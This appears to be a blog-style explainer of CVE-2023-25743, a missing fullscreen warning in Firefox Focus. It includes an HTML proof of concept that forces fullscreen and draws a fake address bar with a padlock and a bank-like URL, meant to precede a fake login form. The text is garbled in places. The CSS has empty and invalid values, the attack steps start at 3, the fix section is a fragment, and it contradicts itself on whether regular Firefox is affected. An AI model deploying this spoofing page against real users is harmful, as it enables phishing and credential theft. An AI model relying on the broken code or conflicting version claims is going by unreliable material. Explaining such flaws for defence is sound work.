CVE-2023-25743 is a subtle but surprisingly dangerous vulnerability that was discovered in Firefox Focus, Mozilla’s privacy-focused mobile browser. This bug allowed malicious websites to take advantage of a missing “in-app notification” when entering fullscreen mode. As a result, attackers could mimic the look of browser controls (also called "browser chrome") to trick users into thinking phishing pages were genuine.
If you’re using regular Firefox, good news—you’re safe. This CVE only affects Firefox Focus and some versions of Firefox ESR (Extended Support Release), specifically Firefox < 110 and Firefox ESR < 102.8. Let’s break down what happened, how an attacker could exploit it, and how it was fixed.
What Really Happened?
When a website enters fullscreen mode, browsers usually give a visual cue or notification, alerting the user to this change. This protects users from “UI redressing” attacks, where a malicious site pretends to be part of the browser or operating system.
In Firefox Focus, entering fullscreen didn’t trigger this warning. So after going fullscreen, an attacker could draw their own fake address bar or security indicators at the top of the screen, making it seem like you’re still browsing safely—even though you’re not.
No notification warns you you're entering fullscreen—so you might not notice anything changed.
3. The malicious website draws a fake address bar at the top of the page, copying Firefox’s look and feel.
4. Now you might trust what you see, and even enter login info or other sensitive data—into a fake site.
The Exploit in Action: Code Sample
Here’s a simple demonstration (for educational purposes only!). This example tricks the browser into fullscreen and overlays a fake address bar:
<!DOCTYPE html>
<html>
<head>
<style>
#fake-address-bar {
position: fixed;
top: ;
left: ;
width: 100vw;
height: 50px;
background: #f9f9fa;
border-bottom: 1px solid #ccc;
z-index: 9999;
font-family: sans-serif;
display: flex;
align-items: center;
padding-left: 16px;
box-sizing: border-box;
}
#fake-lock {
color: #a840a;
margin-right: 8px;
}
#fake-url {
color: #555;
font-size: 14px;
}
</style>
</head>
<body>
<div id="fake-address-bar">
<span id="fake-lock">🔒</span>
<span id="fake-url">https://accounts-bank.com/secure</span>;
</div>
<h1>Welcome! Please sign in below.</h1>
<!-- Fake login form could go here -->
<script>
// Trigger fullscreen automatically
document.documentElement.requestFullscreen();
</script>
</body>
</html>
When opened in a vulnerable Firefox Focus installation, this page immediately goes fullscreen—no pop-up or warning in sight. The user sees a fake address bar, possibly with a padlock, and everything looks legit.
Why Is This So Dangerous?
- Phishing attacks: Users trust browser UI elements (like address bars and padlocks). Faking these can massively boost the success rate of phishing.
- No visual warning: Most browsers alert users when a site hides most of their controls. Firefox Focus, due to this bug, didn’t—which gives attackers a big advantage.
Firefox ESR 102.8 and up
After the patch, entering fullscreen will alert the user, making it much harder for an attacker to pull off this trick without being noticed.
References and Further Reading
- Mozilla Security Advisory: MFSA 2023-08
- Official CVE Entry: CVE-2023-25743 on CVE.org
- Bugzilla Report (Mozilla’s bug tracker): Bug 1816446
- Understanding Fullscreen API Security
Conclusion & Recommendations
If you use Firefox Focus, update NOW to the latest version. This bug shows how even small usability issues (like a missing notification) can open the door for serious attacks, including phishing and UI spoofing.
Stay safe, and keep your browsers updated!
*This CVE only affects Firefox Focus. Regular Firefox and other browsers are NOT affected by this issue.*
Timeline
Published on: 06/02/2023 17:15:00 UTC
Last modified on: 06/09/2023 18:23:00 UTC